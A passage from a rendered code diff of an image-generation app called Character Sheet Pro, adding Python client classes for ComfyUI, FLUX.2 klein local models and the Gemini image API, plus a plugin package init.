if 'images' in node_output:
|
| 533 |
+
for img_info in node_output['images']:
|
| 534 |
+
img_data = self._get_image(
|
| 535 |
+
img_info['filename'],
|
| 536 |
+
img_info.get('subfolder', ''),
|
| 537 |
+
img_info.get('type', 'temp')
|
| 538 |
+
)
|
| 539 |
+
image = Image.open(io.BytesIO(img_data))
|
| 540 |
+
generation_time = time.time() - start_time
|
| 541 |
+
logger.info(f"Generated in {generation_time:.2f}s: {image.size}")
|
| 542 |
+
|
| 543 |
+
# Crop+resize to target aspect ratio
|
| 544 |
+
if (target_w, target_h) != (native_w, native_h):
|
| 545 |
+
image = self._crop_and_resize(image, target_w, target_h)
|
| 546 |
+
logger.info(f"Post-processed to: {image.size}")
|
| 547 |
+
|
| 548 |
+
return GenerationResult.success_result(
|
| 549 |
+
image=image,
|
| 550 |
+
message=f"Generated with ComfyUI/Qwen in {generation_time:.2f}s",
|
| 551 |
+
generation_time=generation_time
|
| 552 |
+
)
|
| 553 |
+
|
| 554 |
+
return GenerationResult.error_result("No output images found")
|
| 555 |
+
|
| 556 |
+
except Exception as e:
|
| 557 |
+
logger.error(f"ComfyUI generation failed: {e}", exc_info=True)
|
| 558 |
+
return GenerationResult.error_result(f"ComfyUI error: {str(e)}")
|
| 559 |
+
|
| 560 |
+
def unload_model(self):
|
| 561 |
+
"""
|
| 562 |
+
Request ComfyUI to free memory.
|
| 563 |
+
Note: ComfyUI manages models automatically, but we can request cleanup.
|
| 564 |
+
"""
|
| 565 |
+
try:
|
| 566 |
+
url = f"http://{self.server_address}/free"
|
| 567 |
+
data = json.dumps({"unload_models": True}).encode('utf-8')
|
| 568 |
+
req = urllib.request.Request(url, data=data, method='POST')
|
| 569 |
+
urllib.request.urlopen(req)
|
| 570 |
+
logger.info("Requested ComfyUI to free memory")
|
| 571 |
+
except Exception as e:
|
| 572 |
+
logger.warning(f"Failed to request memory cleanup: {e}")
|
| 573 |
+
|
| 574 |
+
@classmethod
|
| 575 |
+
def get_dimensions(cls, aspect_ratio: str) -> Tuple[int, int]:
|
| 576 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 577 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 578 |
+
return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
src/core/__init__.py
ADDED
|
@@ -0,0 +1,16 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Character Sheet Pro - Core API
|
| 3 |
+
==============================
|
| 4 |
+
|
| 5 |
+
Exposes core functionality for plugins.
|
| 6 |
+
"""
|
| 7 |
+
|
| 8 |
+
from .plugin_base import Plugin, PluginMetadata, PluginAPI
|
| 9 |
+
from .plugin_manager import PluginManager
|
| 10 |
+
|
| 11 |
+
__all__ = [
|
| 12 |
+
'Plugin',
|
| 13 |
+
'PluginMetadata',
|
| 14 |
+
'PluginAPI',
|
| 15 |
+
'PluginManager'
|
| 16 |
+
]
|
src/flux_klein_client.py
ADDED
|
@@ -0,0 +1,270 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
FLUX.2 Klein Client
|
| 3 |
+
===================
|
| 4 |
+
|
| 5 |
+
Client for FLUX.2 klein 4B local image generation.
|
| 6 |
+
Supports text-to-image and multi-reference editing.
|
| 7 |
+
"""
|
| 8 |
+
|
| 9 |
+
import logging
|
| 10 |
+
import time
|
| 11 |
+
from typing import Optional, List
|
| 12 |
+
from PIL import Image
|
| 13 |
+
|
| 14 |
+
import torch
|
| 15 |
+
|
| 16 |
+
from .models import GenerationRequest, GenerationResult
|
| 17 |
+
|
| 18 |
+
|
| 19 |
+
logger = logging.getLogger(__name__)
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
class FluxKleinClient:
|
| 23 |
+
"""
|
| 24 |
+
Client for FLUX.2 klein models.
|
| 25 |
+
|
| 26 |
+
Supports:
|
| 27 |
+
- Text-to-image generation
|
| 28 |
+
- Single and multi-reference image editing
|
| 29 |
+
- Multiple model sizes (4B, 9B) and variants (distilled, base)
|
| 30 |
+
"""
|
| 31 |
+
|
| 32 |
+
# Model variants - choose based on quality/speed tradeoff
|
| 33 |
+
MODELS = {
|
| 34 |
+
# 4B models (~13GB VRAM)
|
| 35 |
+
"4b": "black-forest-labs/FLUX.2-klein-4B", # Distilled, 4 steps
|
| 36 |
+
"4b-base": "black-forest-labs/FLUX.2-klein-base-4B", # Base, configurable steps
|
| 37 |
+
# 9B models (~29GB VRAM, better quality)
|
| 38 |
+
"9b": "black-forest-labs/FLUX.2-klein-9B", # Distilled, 4 steps
|
| 39 |
+
"9b-base": "black-forest-labs/FLUX.2-klein-base-9B", # Base, 50 steps - BEST QUALITY
|
| 40 |
+
"9b-fp8": "black-forest-labs/FLUX.2-klein-9b-fp8", # FP8 quantized (~20GB)
|
| 41 |
+
}
|
| 42 |
+
|
| 43 |
+
# Legacy compatibility
|
| 44 |
+
MODEL_ID = MODELS["4b"]
|
| 45 |
+
MODEL_ID_BASE = MODELS["4b-base"]
|
| 46 |
+
|
| 47 |
+
# Aspect ratio to dimensions mapping
|
| 48 |
+
ASPECT_RATIOS = {
|
| 49 |
+
"1:1": (1024, 1024),
|
| 50 |
+
"16:9": (1344, 768),
|
| 51 |
+
"9:16": (768, 1344),
|
| 52 |
+
"21:9": (1536, 640), # Cinematic ultra-wide
|
| 53 |
+
"3:2": (1248, 832),
|
| 54 |
+
"2:3": (832, 1248),
|
| 55 |
+
"3:4": (896, 1152),
|
| 56 |
+
"4:3": (1152, 896),
|
| 57 |
+
"4:5": (896, 1120),
|
| 58 |
+
"5:4": (1120, 896),
|
| 59 |
+
}
|
| 60 |
+
|
| 61 |
+
# Default settings for each model variant
|
| 62 |
+
MODEL_DEFAULTS = {
|
| 63 |
+
"4b": {"steps": 4, "guidance": 1.0},
|
| 64 |
+
"4b-base": {"steps": 28, "guidance": 3.5},
|
| 65 |
+
"9b": {"steps": 4, "guidance": 1.0},
|
| 66 |
+
"9b-base": {"steps": 50, "guidance": 4.0}, # Best quality
|
| 67 |
+
"9b-fp8": {"steps": 4, "guidance": 4.0},
|
| 68 |
+
}
|
| 69 |
+
|
| 70 |
+
def __init__(
|
| 71 |
+
self,
|
| 72 |
+
model_variant: str = "9b-base", # Default to highest quality
|
| 73 |
+
device: str = "cuda",
|
| 74 |
+
dtype: torch.dtype = torch.bfloat16,
|
| 75 |
+
enable_cpu_offload: bool = True,
|
| 76 |
+
# Legacy params
|
| 77 |
+
use_base_model: bool = False,
|
| 78 |
+
):
|
| 79 |
+
"""
|
| 80 |
+
Initialize FLUX.2 klein client.
|
| 81 |
+
|
| 82 |
+
Args:
|
| 83 |
+
model_variant: Model variant to use:
|
| 84 |
+
- "4b": Fast, 4 steps, ~13GB VRAM
|
| 85 |
+
- "4b-base": Configurable steps, ~13GB VRAM
|
| 86 |
+
- "9b": Better quality, 4 steps, ~29GB VRAM
|
| 87 |
+
- "9b-base": BEST quality, 50 steps, ~29GB VRAM
|
| 88 |
+
- "9b-fp8": FP8 quantized, ~20GB VRAM
|
| 89 |
+
device: Device to use (cuda or cpu)
|
| 90 |
+
dtype: Data type for model weights
|
| 91 |
+
enable_cpu_offload: Enable CPU offload to save VRAM
|
| 92 |
+
"""
|
| 93 |
+
# Handle legacy use_base_model parameter
|
| 94 |
+
if use_base_model and model_variant == "9b-base":
|
| 95 |
+
model_variant = "4b-base"
|
| 96 |
+
|
| 97 |
+
self.model_variant = model_variant
|
| 98 |
+
self.device = device
|
| 99 |
+
self.dtype = dtype
|
| 100 |
+
self.enable_cpu_offload = enable_cpu_offload
|
| 101 |
+
self.pipe = None
|
| 102 |
+
self._loaded = False
|
| 103 |
+
|
| 104 |
+
# Get default settings for this variant
|
| 105 |
+
defaults = self.MODEL_DEFAULTS.get(model_variant, {"steps": 4, "guidance": 1.0})
|
| 106 |
+
self.default_steps = defaults["steps"]
|
| 107 |
+
self.default_guidance = defaults["guidance"]
|
| 108 |
+
|
| 109 |
+
logger.info(f"FluxKleinClient initialized (variant: {model_variant}, steps: {self.default_steps}, guidance: {self.default_guidance})")
|
| 110 |
+
|
| 111 |
+
def load_model(self) -> bool:
|
| 112 |
+
"""Load the model into memory."""
|
| 113 |
+
if self._loaded:
|
| 114 |
+
return True
|
| 115 |
+
|
| 116 |
+
try:
|
| 117 |
+
# Get model ID for selected variant
|
| 118 |
+
model_id = self.MODELS.get(self.model_variant, self.MODELS["4b"])
|
| 119 |
+
logger.info(f"Loading FLUX.2 klein ({self.model_variant}) from {model_id}...")
|
| 120 |
+
|
| 121 |
+
start_time = time.time()
|
| 122 |
+
|
| 123 |
+
# FLUX.2 klein requires Flux2KleinPipeline (specific to klein models)
|
| 124 |
+
# Requires diffusers from git: pip install git+https://github.com/huggingface/diffusers.git
|
| 125 |
+
from diffusers import Flux2KleinPipeline
|
| 126 |
+
|
| 127 |
+
self.pipe = Flux2KleinPipeline.from_pretrained(
|
| 128 |
+
model_id,
|
| 129 |
+
torch_dtype=self.dtype,
|
| 130 |
+
)
|
| 131 |
+
|
| 132 |
+
# Use enable_model_cpu_offload() for VRAM management (documented approach)
|
| 133 |
+
if self.enable_cpu_offload:
|
| 134 |
+
self.pipe.enable_model_cpu_offload()
|
| 135 |
+
logger.info("CPU offload enabled")
|
| 136 |
+
else:
|
| 137 |
+
self.pipe.to(self.device)
|
| 138 |
+
logger.info(f"Model moved to {self.device}")
|
| 139 |
+
|
| 140 |
+
load_time = time.time() - start_time
|
| 141 |
+
logger.info(f"FLUX.2 klein ({self.model_variant}) loaded in {load_time:.1f}s")
|
| 142 |
+
|
| 143 |
+
# Validate by running a test generation
|
| 144 |
+
logger.info("Validating model with test generation...")
|
| 145 |
+
try:
|
| 146 |
+
test_result = self.pipe(
|
| 147 |
+
prompt="A simple test image",
|
| 148 |
+
height=256,
|
| 149 |
+
width=256,
|
| 150 |
+
guidance_scale=1.0,
|
| 151 |
+
num_inference_steps=1,
|
| 152 |
+
generator=torch.Generator(device="cpu").manual_seed(42),
|
| 153 |
+
)
|
| 154 |
+
if test_result.images[0] is not None:
|
| 155 |
+
logger.info("Model validation successful")
|
| 156 |
+
else:
|
| 157 |
+
logger.error("Model validation failed: no output image")
|
| 158 |
+
return False
|
| 159 |
+
except Exception as e:
|
| 160 |
+
logger.error(f"Model validation failed: {e}", exc_info=True)
|
| 161 |
+
return False
|
| 162 |
+
|
| 163 |
+
self._loaded = True
|
| 164 |
+
return True
|
| 165 |
+
|
| 166 |
+
except Exception as e:
|
| 167 |
+
logger.error(f"Failed to load FLUX.2 klein: {e}", exc_info=True)
|
| 168 |
+
return False
|
| 169 |
+
|
| 170 |
+
def unload_model(self):
|
| 171 |
+
"""Unload model from memory."""
|
| 172 |
+
if self.pipe is not None:
|
| 173 |
+
del self.pipe
|
| 174 |
+
self.pipe = None
|
| 175 |
+
self._loaded = False
|
| 176 |
+
|
| 177 |
+
if torch.cuda.is_available():
|
| 178 |
+
torch.cuda.empty_cache()
|
| 179 |
+
|
| 180 |
+
logger.info("FLUX.2 klein unloaded")
|
| 181 |
+
|
| 182 |
+
def generate(
|
| 183 |
+
self,
|
| 184 |
+
request: GenerationRequest,
|
| 185 |
+
num_inference_steps: int = None,
|
| 186 |
+
guidance_scale: float = None
|
| 187 |
+
) -> GenerationResult:
|
| 188 |
+
"""
|
| 189 |
+
Generate image using FLUX.2 klein.
|
| 190 |
+
|
| 191 |
+
Args:
|
| 192 |
+
request: GenerationRequest object
|
| 193 |
+
num_inference_steps: Number of denoising steps (4 for klein distilled)
|
| 194 |
+
guidance_scale: Classifier-free guidance scale
|
| 195 |
+
|
| 196 |
+
Returns:
|
| 197 |
+
GenerationResult object
|
| 198 |
+
"""
|
| 199 |
+
if not self._loaded:
|
| 200 |
+
if not self.load_model():
|
| 201 |
+
return GenerationResult.error_result("Failed to load FLUX.2 klein model")
|
| 202 |
+
|
| 203 |
+
# Use model defaults if not specified
|
| 204 |
+
if num_inference_steps is None:
|
| 205 |
+
num_inference_steps = self.default_steps
|
| 206 |
+
if guidance_scale is None:
|
| 207 |
+
guidance_scale = self.default_guidance
|
| 208 |
+
|
| 209 |
+
try:
|
| 210 |
+
start_time = time.time()
|
| 211 |
+
|
| 212 |
+
# Get dimensions from aspect ratio
|
| 213 |
+
width, height = self._get_dimensions(request.aspect_ratio)
|
| 214 |
+
|
| 215 |
+
logger.info(f"Generating with {self.model_variant}: steps={num_inference_steps}, guidance={guidance_scale}")
|
| 216 |
+
|
| 217 |
+
# Build generation kwargs
|
| 218 |
+
gen_kwargs = {
|
| 219 |
+
"prompt": request.prompt,
|
| 220 |
+
"height": height,
|
| 221 |
+
"width": width,
|
| 222 |
+
"guidance_scale": guidance_scale,
|
| 223 |
+
"num_inference_steps": num_inference_steps,
|
| 224 |
+
"generator": torch.Generator(device="cpu").manual_seed(42),
|
| 225 |
+
}
|
| 226 |
+
|
| 227 |
+
# Add input images if present (for editing)
|
| 228 |
+
if request.has_input_images:
|
| 229 |
+
# FLUX.2 klein supports multi-reference editing
|
| 230 |
+
# Pass images as 'image' parameter
|
| 231 |
+
valid_images = [img for img in request.input_images if img is not None]
|
| 232 |
+
if len(valid_images) == 1:
|
| 233 |
+
gen_kwargs["image"] = valid_images[0]
|
| 234 |
+
elif len(valid_images) > 1:
|
| 235 |
+
gen_kwargs["image"] = valid_images
|
| 236 |
+
|
| 237 |
+
logger.info(f"Generating with FLUX.2 klein: {request.prompt[:80]}...")
|
| 238 |
+
|
| 239 |
+
# Generate
|
| 240 |
+
with torch.inference_mode():
|
| 241 |
+
output = self.pipe(**gen_kwargs)
|
| 242 |
+
image = output.images[0]
|
| 243 |
+
|
| 244 |
+
generation_time = time.time() - start_time
|
| 245 |
+
logger.info(f"Generated in {generation_time:.2f}s: {image.size}")
|
| 246 |
+
|
| 247 |
+
return GenerationResult.success_result(
|
| 248 |
+
image=image,
|
| 249 |
+
message=f"Generated with FLUX.2 klein in {generation_time:.2f}s",
|
| 250 |
+
generation_time=generation_time
|
| 251 |
+
)
|
| 252 |
+
|
| 253 |
+
except Exception as e:
|
| 254 |
+
logger.error(f"FLUX.2 klein generation failed: {e}", exc_info=True)
|
| 255 |
+
return GenerationResult.error_result(f"FLUX.2 klein error: {str(e)}")
|
| 256 |
+
|
| 257 |
+
def _get_dimensions(self, aspect_ratio: str) -> tuple:
|
| 258 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 259 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 260 |
+
return self.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
| 261 |
+
|
| 262 |
+
def is_healthy(self) -> bool:
|
| 263 |
+
"""Check if model is loaded and ready."""
|
| 264 |
+
return self._loaded and self.pipe is not None
|
| 265 |
+
|
| 266 |
+
@classmethod
|
| 267 |
+
def get_dimensions(cls, aspect_ratio: str) -> tuple:
|
| 268 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 269 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 270 |
+
return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
src/gemini_client.py
ADDED
|
@@ -0,0 +1,224 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Gemini API Client
|
| 3 |
+
=================
|
| 4 |
+
|
| 5 |
+
Client for Google Gemini Image APIs (Flash and Pro models).
|
| 6 |
+
Handles API communication and response parsing.
|
| 7 |
+
"""
|
| 8 |
+
|
| 9 |
+
import base64
|
| 10 |
+
import logging
|
| 11 |
+
from io import BytesIO
|
| 12 |
+
from typing import Optional
|
| 13 |
+
from PIL import Image
|
| 14 |
+
|
| 15 |
+
from google import genai
|
| 16 |
+
from google.genai import types
|
| 17 |
+
|
| 18 |
+
from .models import GenerationRequest, GenerationResult
|
| 19 |
+
|
| 20 |
+
|
| 21 |
+
logger = logging.getLogger(__name__)
|
| 22 |
+
|
| 23 |
+
|
| 24 |
+
class GeminiClient:
|
| 25 |
+
"""
|
| 26 |
+
Client for Gemini Image APIs.
|
| 27 |
+
|
| 28 |
+
Supports:
|
| 29 |
+
- Gemini 2.5 Flash Image (up to ~3 reference images)
|
| 30 |
+
- Gemini 3 Pro Image Preview (up to 14 reference images, 1K/2K/4K)
|
| 31 |
+
"""
|
| 32 |
+
|
| 33 |
+
# Model names (updated January 2026)
|
| 34 |
+
# See: https://ai.google.dev/gemini-api/docs/image-generation
|
| 35 |
+
MODEL_FLASH = "gemini-2.5-flash-image" # Fast, efficient image generation
|
| 36 |
+
MODEL_PRO = "gemini-3-pro-image-preview" # Pro quality, advanced text rendering
|
| 37 |
+
|
| 38 |
+
# Valid resolutions for Pro model
|
| 39 |
+
VALID_RESOLUTIONS = ["1K", "2K", "4K"]
|
| 40 |
+
|
| 41 |
+
# Aspect ratio to dimensions mapping
|
| 42 |
+
ASPECT_RATIOS = {
|
| 43 |
+
"1:1": (1024, 1024),
|
| 44 |
+
"16:9": (1344, 768),
|
| 45 |
+
"9:16": (768, 1344),
|
| 46 |
+
"21:9": (1536, 640), # Cinematic ultra-wide
|
| 47 |
+
"3:2": (1248, 832),
|
| 48 |
+
"2:3": (832, 1248),
|
| 49 |
+
"3:4": (864, 1184),
|
| 50 |
+
"4:3": (1344, 1008),
|
| 51 |
+
"4:5": (1024, 1280),
|
| 52 |
+
"5:4": (1280, 1024),
|
| 53 |
+
}
|
| 54 |
+
|
| 55 |
+
def __init__(self, api_key: str, use_pro_model: bool = False):
|
| 56 |
+
"""
|
| 57 |
+
Initialize Gemini client.
|
| 58 |
+
|
| 59 |
+
Args:
|
| 60 |
+
api_key: Google Gemini API key
|
| 61 |
+
use_pro_model: If True, use Pro model with enhanced capabilities
|
| 62 |
+
"""
|
| 63 |
+
if not api_key:
|
| 64 |
+
raise ValueError("API key is required for Gemini client")
|
| 65 |
+
|
| 66 |
+
self.api_key = api_key
|
| 67 |
+
self.use_pro_model = use_pro_model
|
| 68 |
+
self.client = genai.Client(api_key=api_key)
|
| 69 |
+
|
| 70 |
+
model_name = self.MODEL_PRO if use_pro_model else self.MODEL_FLASH
|
| 71 |
+
logger.info(f"GeminiClient initialized with model: {model_name}")
|
| 72 |
+
|
| 73 |
+
def generate(
|
| 74 |
+
self,
|
| 75 |
+
request: GenerationRequest,
|
| 76 |
+
resolution: str = "1K"
|
| 77 |
+
) -> GenerationResult:
|
| 78 |
+
"""
|
| 79 |
+
Generate image using Gemini API.
|
| 80 |
+
|
| 81 |
+
Args:
|
| 82 |
+
request: GenerationRequest object
|
| 83 |
+
resolution: Resolution for Pro model ("1K", "2K", "4K")
|
| 84 |
+
|
| 85 |
+
Returns:
|
| 86 |
+
GenerationResult object
|
| 87 |
+
"""
|
| 88 |
+
try:
|
| 89 |
+
model_name = self.MODEL_PRO if self.use_pro_model else self.MODEL_FLASH
|
| 90 |
+
logger.info(f"Generating with {model_name}: {request.prompt[:100]}...")
|
| 91 |
+
|
| 92 |
+
# Build contents list
|
| 93 |
+
contents = self._build_contents(request)
|
| 94 |
+
|
| 95 |
+
# Build config
|
| 96 |
+
config = self._build_config(
|
| 97 |
+
request,
|
| 98 |
+
resolution if self.use_pro_model else None
|
| 99 |
+
)
|
| 100 |
+
|
| 101 |
+
# Call API
|
| 102 |
+
response = self.client.models.generate_content(
|
| 103 |
+
model=model_name,
|
| 104 |
+
contents=contents,
|
| 105 |
+
config=config
|
| 106 |
+
)
|
| 107 |
+
|
| 108 |
+
# Parse response
|
| 109 |
+
return self._parse_response(response)
|
| 110 |
+
|
| 111 |
+
except Exception as e:
|
| 112 |
+
logger.error(f"Gemini generation failed: {e}", exc_info=True)
|
| 113 |
+
return GenerationResult.error_result(f"Gemini API error: {str(e)}")
|
| 114 |
+
|
| 115 |
+
def _build_contents(self, request: GenerationRequest) -> list:
|
| 116 |
+
"""Build contents list for API request."""
|
| 117 |
+
contents = []
|
| 118 |
+
|
| 119 |
+
# Add input images if present
|
| 120 |
+
if request.has_input_images:
|
| 121 |
+
valid_images = [img for img in request.input_images if img is not None]
|
| 122 |
+
contents.extend(valid_images)
|
| 123 |
+
|
| 124 |
+
# Add prompt
|
| 125 |
+
contents.append(request.prompt)
|
| 126 |
+
|
| 127 |
+
return contents
|
| 128 |
+
|
| 129 |
+
def _build_config(
|
| 130 |
+
self,
|
| 131 |
+
request: GenerationRequest,
|
| 132 |
+
resolution: Optional[str] = None
|
| 133 |
+
) -> types.GenerateContentConfig:
|
| 134 |
+
"""Build generation config for API request."""
|
| 135 |
+
# Parse aspect ratio
|
| 136 |
+
aspect_ratio = request.aspect_ratio
|
| 137 |
+
if " " in aspect_ratio:
|
| 138 |
+
aspect_ratio = aspect_ratio.split()[0]
|
| 139 |
+
|
| 140 |
+
# Build image config
|
| 141 |
+
image_config_kwargs = {"aspect_ratio": aspect_ratio}
|
| 142 |
+
|
| 143 |
+
# Add resolution for Pro model
|
| 144 |
+
if resolution and self.use_pro_model:
|
| 145 |
+
if resolution not in self.VALID_RESOLUTIONS:
|
| 146 |
+
logger.warning(f"Invalid resolution '{resolution}', defaulting to '1K'")
|
| 147 |
+
resolution = "1K"
|
| 148 |
+
image_config_kwargs["output_image_resolution"] = resolution
|
| 149 |
+
logger.info(f"Pro model resolution: {resolution}")
|
| 150 |
+
|
| 151 |
+
config = types.GenerateContentConfig(
|
| 152 |
+
temperature=request.temperature,
|
| 153 |
+
response_modalities=["image", "text"],
|
| 154 |
+
image_config=types.ImageConfig(**image_config_kwargs)
|
| 155 |
+
)
|
| 156 |
+
|
| 157 |
+
return config
|
| 158 |
+
|
| 159 |
+
def _parse_response(self, response) -> GenerationResult:
|
| 160 |
+
"""Parse API response and extract image."""
|
| 161 |
+
if response is None:
|
| 162 |
+
return GenerationResult.error_result("No response from API")
|
| 163 |
+
|
| 164 |
+
if not hasattr(response, 'candidates') or not response.candidates:
|
| 165 |
+
return GenerationResult.error_result("No candidates in response")
|
| 166 |
+
|
| 167 |
+
candidate = response.candidates[0]
|
| 168 |
+
|
| 169 |
+
# Check finish reason
|
| 170 |
+
if hasattr(candidate, 'finish_reason'):
|
| 171 |
+
finish_reason = str(candidate.finish_reason)
|
| 172 |
+
logger.info(f"Finish reason: {finish_reason}")
|
| 173 |
+
|
| 174 |
+
if 'SAFETY' in finish_reason or 'PROHIBITED' in finish_reason:
|
| 175 |
+
return GenerationResult.error_result(
|
| 176 |
+
f"Content blocked by safety filters: {finish_reason}"
|
| 177 |
+
)
|
| 178 |
+
|
| 179 |
+
# Check for content
|
| 180 |
+
if not hasattr(candidate, 'content') or candidate.content is None:
|
| 181 |
+
finish_reason = getattr(candidate, 'finish_reason', 'UNKNOWN')
|
| 182 |
+
return GenerationResult.error_result(
|
| 183 |
+
f"No content in response (finish_reason: {finish_reason})"
|
| 184 |
+
)
|
| 185 |
+
|
| 186 |
+
# Extract image from parts
|
| 187 |
+
if hasattr(candidate.content, 'parts') and candidate.content.parts:
|
| 188 |
+
for part in candidate.content.parts:
|
| 189 |
+
if hasattr(part, 'inline_data') and part.inline_data:
|
| 190 |
+
try:
|
| 191 |
+
image_data = part.inline_data.data
|
| 192 |
+
|
| 193 |
+
# Handle both bytes and base64 string
|
| 194 |
+
if isinstance(image_data, str):
|
| 195 |
+
image_data = base64.b64decode(image_data)
|
| 196 |
+
|
| 197 |
+
# Convert to PIL Image
|
| 198 |
+
image_buffer = BytesIO(image_data)
|
| 199 |
+
image = Image.open(image_buffer)
|
| 200 |
+
image.load()
|
| 201 |
+
|
| 202 |
+
logger.info(f"Image generated: {image.size}, {image.mode}")
|
| 203 |
+
return GenerationResult.success_result(
|
| 204 |
+
image=image,
|
| 205 |
+
message="Generated successfully"
|
| 206 |
+
)
|
